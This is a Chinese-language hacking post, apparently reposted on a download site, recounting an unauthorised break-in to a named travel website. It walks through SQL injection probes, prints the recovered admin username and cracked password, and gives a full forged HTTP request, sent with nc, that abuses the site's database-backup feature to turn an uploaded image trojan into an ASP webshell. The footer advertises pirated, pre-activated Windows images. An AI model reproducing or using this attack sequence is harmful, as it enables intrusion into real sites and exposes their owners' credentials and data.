數(shù)據(jù)庫抓包另類備份的詳細(xì)方法與解讀
这是我之前在绿色兵团时写的一篇文章,是我自己原创的,思路借鉴了一篇t00ls里的,进行了改进。我在绿色兵团的账号名字也是leisureforest
真实性毋庸置疑,希望给过。thanks
数据库抓包另类备份
地址https://www.jb51.net/(仅用于替代目标网站,非本站)
数据库抓包另类备份
又是旅游网。我刚才发了一篇文章,正想走,外面下雨了。实在是闲的难受。再写这个,提提我人气。
数据库抓包另类备份
这个地址是一个家伙发给我的,他说让我试一试,我随便找了个链接http://www.kmholiday.com/Travel/Travel_line_view.asp?lineid=1030’加了个特殊字符,马上返回错误信息
数据库抓包另类备份
Microsoft JET Database Engine
数据库抓包另类备份
错误'80040e14'
语法错误(操作符丢失) 在查询表达式'id=1030‘' 中。
数据库抓包另类备份
/Travel/Travel_line_view.asp,行 41
数据库抓包另类备份
数据库抓包另类备份
什么意思嘛。这不明摆着让我搞他。access的数据库,直接上语句,and exists(select * from msysobjects)
数据库抓包另类备份
数据库抓包另类备份
Microsoft JET Database Engine
数据库抓包另类备份
错误'80040e09'
数据库抓包另类备份
不能读取记录;在'msysobjects' 上没有读取数据权限。
数据库抓包另类备份
/Travel/Travel_line_view.asp,行41
数据库抓包另类备份
有这个表但是不能访问。好的 接着执行and exists(select * from admin) 正常页面 ;有admin表---- 帅
数据库抓包另类备份
and exists(select count(user) from admin)还是正常页面有user字段
数据库抓包另类备份
and exists(select count(psw from admin) 正常页面,密码字段。
数据库抓包另类备份
用户名aidy 密码28B9E7A5FADBDB964E9069BC82AC2AF9 32位加密的,吓死我了。去MD5搞了下,汗19850311 奶奶的,真唬人。这时我就给那人发信息了,这个也太简单了吧,还高什么,他说,拿到shell才算。好吧接着搞。
数据库抓包另类备份
找后台,这个可真难住我了。先上工具,扫了四万多条愣是没找到。其实这种情况他肯定有个目录很难差,根本不好搞,怎么办,还是google ,用了好几个语句,只找到俩登陆页面但是都不对。还是回到首页看图片,但是右键不能使用,不让查看属性。最后下载的时候从迅雷里看的地址。我真有办法哈哈……
数据库抓包另类备份
找到这个页面了http://www.kmholiday.com/adminsheeninfo/直接跳转登陆。
数据库抓包另类备份
进去之后发现有数据库备份。先找了个上传,上传了个图片木马正当我兴致勃勃地来备份的时候,出问题了,原来备份路径不能修改。也就是说你备份只能备份mdb数据库文件,备份之后的文件名为asa,这个倒是没问题,iis可以解析,关键是路径不让动,这可难死我了,怎么办呢。还是右键查看源码吧。找到了这个链接
数据库抓包另类备份
https://www.jb51.net/ adminsheeninfo/Oledit/ewebeditor/汗,又是编辑器,编辑器啊编辑器,又是你,都不想搞了,进入编辑器,登陆页面也没有删除。现在我写文章的时候被删了,我知道是谁删的(不是我),不截图了。进去还是那个用户名密码。找到样式管理,原来的样式保存按钮被删除了,他以为这样就安全了。那么我copy了一个样式,在新创建的样式里,添加了asp格式。asa.但是都没有成功,其实如果在这里添加aaspsp就可以了,但是我没想到他有这么蠢的漏洞,我就没这么搞。难道我会拿不到shell。不可能。
数据库抓包另类备份
于是我苦思冥想,终于想到了一句话木马。后来一看人家两年前就有人想到这个方法了,就是在添加新闻那里插入一个新闻抓下包,然后改新闻内容为自己的一句话nc提交、如下图
数据库抓包另类备份
抓包内容如下
数据库抓包另类备份
POST /adminsheeninfo/Oledit/Upload.asp?action=remote&type=remote&style=s_light HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/QVOD, application/QVOD, **
Referer: http://www.kmholiday.com/adminsh ... p?action=BackupData
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: www.kmholiday.com
Content-Length: 162
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: cck_lasttime=1312255680031; cck_count=0; ASPSESSIONIDSQQSDTTT=PNFACNHDBNBMAFNBNHHHBFCP
数据库抓包另类备份
DBpath=%2Fadminsheeninfo%2Fdb%2Fweb_date_%23_sheenzhaoghsy%26%23@%21.mdb&bkfolder=..%2F..%2Fdatabase%2FDataBackup%2F&bkDBname=DB_BAK_20110802_1201247.asa&bknotes=
数据库抓包另类备份
大家看到最后这个链接没有,这个事什么意思呢,分析下先。DBpath=%2Fadminsheeninfo%2Fdb%2Fweb_date_%23_sheenzhaoghsy%26%23@%21.mdb这个是原来的数据库名称,%23是空格,%2f是/的编码,转换之后就是/adminsheeninfo/db/web_date_#_sheenzhaoghsy&#@!.mdb备份后的数据库名称就是=..%2F..%2Fdatabase%2FDataBackup%2F&bkDBname我们要修改原来的数据库名称为自己上传的图片马,随便一个吧,比如2011-8-2 12:07:04.jpg,我随便写的,吧原数据库路径改成这个,然后数出来原来的数据库路径的字符长度,比如是162(假设)我不数了,我记得当时数的是153,图片是64,然后用153-64=89那么就把原来的Content-Length: 162修改为89,然后用保存为qq.txt,文件名随便起。保存为txt文档。复制到c盘根目录下面
数据库抓包另类备份
用nc上传(nc也要放到c盘根目录)
数据库抓包另类备份
命令nc www.kmholiday.com 80<qq.txt。上传之后就会返回上传成功的提示。如下
数据库抓包另类备份
%2Fadminsheeninfo%2FOledit%2FUploadFile%2F2011730232015138.jpg 62
已经成功备份,你的数据库的路径:\hosting\wwwroot\kmholiday_cn\htdocs\adminsh eeninfo\../../database/DataBackup/\DB_BAK_20110730_231235.asa返回...
database/DataBackup/\DB_BAK_20110730_231235.asa
数据库抓包另类备份
这个就是备份之后的Asp马地址D:\hosting\wwwroot\kmholiday_cn\htdocs\adminsh eeninfo\../../database/DataBackup/\DB_BAK_20110730_231235.asa用侠客客服端连接一下就可以了,然后上传自己的asp MM,访问,我没再截图,这样不好你懂的。
数据库抓包另类备份
好啦,看来看似简单的东西并不是那么容易得到,切莫眼高收低,像我一样,踏踏实实做事还是好些。
数据库抓包另类备份
推薦系統(tǒng)
雨林木風(fēng) winxp下載 純凈版 永久激活 winxp ghost系統(tǒng) sp3 系統(tǒng)下載
系統(tǒng)大?。?/em>0MB系統(tǒng)類型:WinXP雨林木風(fēng)在系統(tǒng)方面技術(shù)積累雄厚深耕多年,打造了國內(nèi)重裝系統(tǒng)行業(yè)知名品牌,雨林木風(fēng)WindowsXP其系統(tǒng)口碑得到許多人認(rèn)可,積累了廣大的用戶群體,是一款穩(wěn)定流暢的系統(tǒng),雨林木風(fēng) winxp下載 純凈版 永久激活 winxp ghost系統(tǒng) sp3 系統(tǒng)下載,有需要的朋友速度下載吧。
系統(tǒng)等級:進(jìn)入下載 >蘿卜家園win7純凈版 ghost系統(tǒng)下載 x64 聯(lián)想電腦專用
系統(tǒng)大?。?/em>0MB系統(tǒng)類型:Win7蘿卜家園win7純凈版是款非常純凈的win7系統(tǒng),此版本優(yōu)化更新了大量的驅(qū)動(dòng),幫助用戶們進(jìn)行舒適的使用,更加的適合家庭辦公的使用,方便用戶,有需要的用戶們快來下載安裝吧。
系統(tǒng)等級:進(jìn)入下載 >雨林木風(fēng)xp系統(tǒng) xp系統(tǒng)純凈版 winXP ghost xp sp3 純凈版系統(tǒng)下載
系統(tǒng)大?。?/em>1.01GB系統(tǒng)類型:WinXP雨林木風(fēng)xp系統(tǒng) xp系統(tǒng)純凈版 winXP ghost xp sp3 純凈版系統(tǒng)下載,雨林木風(fēng)WinXP系統(tǒng)技術(shù)積累雄厚深耕多年,采用了新的系統(tǒng)功能和硬件驅(qū)動(dòng),可以更好的發(fā)揮系統(tǒng)的性能,優(yōu)化了系統(tǒng)、驅(qū)動(dòng)對硬件的加速,加固了系統(tǒng)安全策略,運(yùn)行環(huán)境安全可靠穩(wěn)定。
系統(tǒng)等級:進(jìn)入下載 >蘿卜家園win10企業(yè)版 免激活密鑰 激活工具 V2023 X64位系統(tǒng)下載
系統(tǒng)大?。?/em>0MB系統(tǒng)類型:Win10蘿卜家園在系統(tǒng)方面技術(shù)積累雄厚深耕多年,打造了國內(nèi)重裝系統(tǒng)行業(yè)的蘿卜家園品牌,(win10企業(yè)版,win10 ghost,win10鏡像),蘿卜家園win10企業(yè)版 免激活密鑰 激活工具 ghost鏡像 X64位系統(tǒng)下載,其系統(tǒng)口碑得到許多人認(rèn)可,積累了廣大的用戶群體,蘿卜家園win10純凈版是一款穩(wěn)定流暢的系統(tǒng),一直以來都以用戶為中心,是由蘿卜家園win10團(tuán)隊(duì)推出的蘿卜家園
系統(tǒng)等級:進(jìn)入下載 >蘿卜家園windows10游戲版 win10游戲?qū)I(yè)版 V2023 X64位系統(tǒng)下載
系統(tǒng)大?。?/em>0MB系統(tǒng)類型:Win10蘿卜家園windows10游戲版 win10游戲?qū)I(yè)版 ghost X64位 系統(tǒng)下載,蘿卜家園在系統(tǒng)方面技術(shù)積累雄厚深耕多年,打造了國內(nèi)重裝系統(tǒng)行業(yè)的蘿卜家園品牌,其系統(tǒng)口碑得到許多人認(rèn)可,積累了廣大的用戶群體,蘿卜家園win10純凈版是一款穩(wěn)定流暢的系統(tǒng),一直以來都以用戶為中心,是由蘿卜家園win10團(tuán)隊(duì)推出的蘿卜家園win10國內(nèi)鏡像版,基于國內(nèi)用戶的習(xí)慣,做
系統(tǒng)等級:進(jìn)入下載 >windows11下載 蘿卜家園win11專業(yè)版 X64位 V2023官網(wǎng)下載
系統(tǒng)大小:0MB系統(tǒng)類型:Win11蘿卜家園在系統(tǒng)方面技術(shù)積累雄厚深耕多年,windows11下載 蘿卜家園win11專業(yè)版 X64位 官網(wǎng)正式版可以更好的發(fā)揮系統(tǒng)的性能,優(yōu)化了系統(tǒng)、驅(qū)動(dòng)對硬件的加速,使得軟件在WINDOWS11系統(tǒng)中運(yùn)行得更加流暢,加固了系統(tǒng)安全策略,WINDOWS11系統(tǒng)在家用辦公上跑分表現(xiàn)都是非常優(yōu)秀,完美的兼容各種硬件和軟件,運(yùn)行環(huán)境安全可靠穩(wěn)定。
系統(tǒng)等級:進(jìn)入下載 >
相關(guān)文章
- 安卓手機(jī)QQ 4.7.2正式發(fā)布 顯示在線好友的網(wǎng)絡(luò)狀態(tài)
- 瑞星安全隨身WiFi怎么用 瑞星隨身WiFi有何亮點(diǎn)以及使用方法
- 您的WiFi安全嗎?讓路由衛(wèi)士來為您把關(guān)讓它變得更快,更安全
- 大勢至局域網(wǎng)共享文件管理軟件詳細(xì)記錄服務(wù)器共享文件訪問日志、保護(hù)共享文件安全
- 金山毒霸發(fā)布全新的V11新春版:殺毒速度更快/軟件凈化
- WinXP如何進(jìn)入安全模式?WinXP進(jìn)入安全模式設(shè)置
- 怎樣消除免費(fèi)WIFI的安全隱患?一張圖看懂免費(fèi)WIFI的安全隱患
- 毒app優(yōu)惠券怎么獲得 毒app無門檻優(yōu)惠券攻略
- 京東通信卡流量超標(biāo)怎樣關(guān)閉移動(dòng)網(wǎng)絡(luò)?
- 詳解火絨安全軟件怎么樣
- Win10系統(tǒng)下安全登錄失敗初始化失敗怎么辦?
- 360安全衛(wèi)士怎么更改默認(rèn)軟件?
- 360稱特斯拉應(yīng)用存漏洞 特斯拉不安全?
- win10安全模式跳過開機(jī)密碼可行嗎
熱門系統(tǒng)
推薦軟件
推薦應(yīng)用
推薦游戲
熱門文章
常用系統(tǒng)
- 1雨林木風(fēng)win10游戲?qū)S冒?x64位永久激活 ghost鏡像 筆記本專用下載
- 2蘿卜家園WIN11純凈版免激活 中文系統(tǒng) X64位 V2022.07下載
- 3win10專業(yè)版(深度技術(shù))GHost鏡像系統(tǒng) 21H2 X64位 V2022.04下載
- 4Windows11家庭版下載 雨林木風(fēng) X64位高性能版本下載 筆記本專用
- 5Win11專業(yè)版下載 深度技術(shù)系統(tǒng)特別奉獻(xiàn) 最新免激活ghost系統(tǒng) ISO鏡像 X64位
- 6windows7穩(wěn)定版下載 深度技術(shù)x64萬能版 ghost系統(tǒng)下載 自動(dòng)激活
- 7技術(shù)員聯(lián)盟win10穩(wěn)定版 ghost系統(tǒng)下載 x64位 筆記本專用下載
- 8系統(tǒng)之家winXP純凈版 ghost iso V2022.05 XP ghost鏡像最新版下載
- 9雨林木風(fēng)Win10 企業(yè)版系統(tǒng)下載 Ghost Windows10 32位系統(tǒng) V2021.11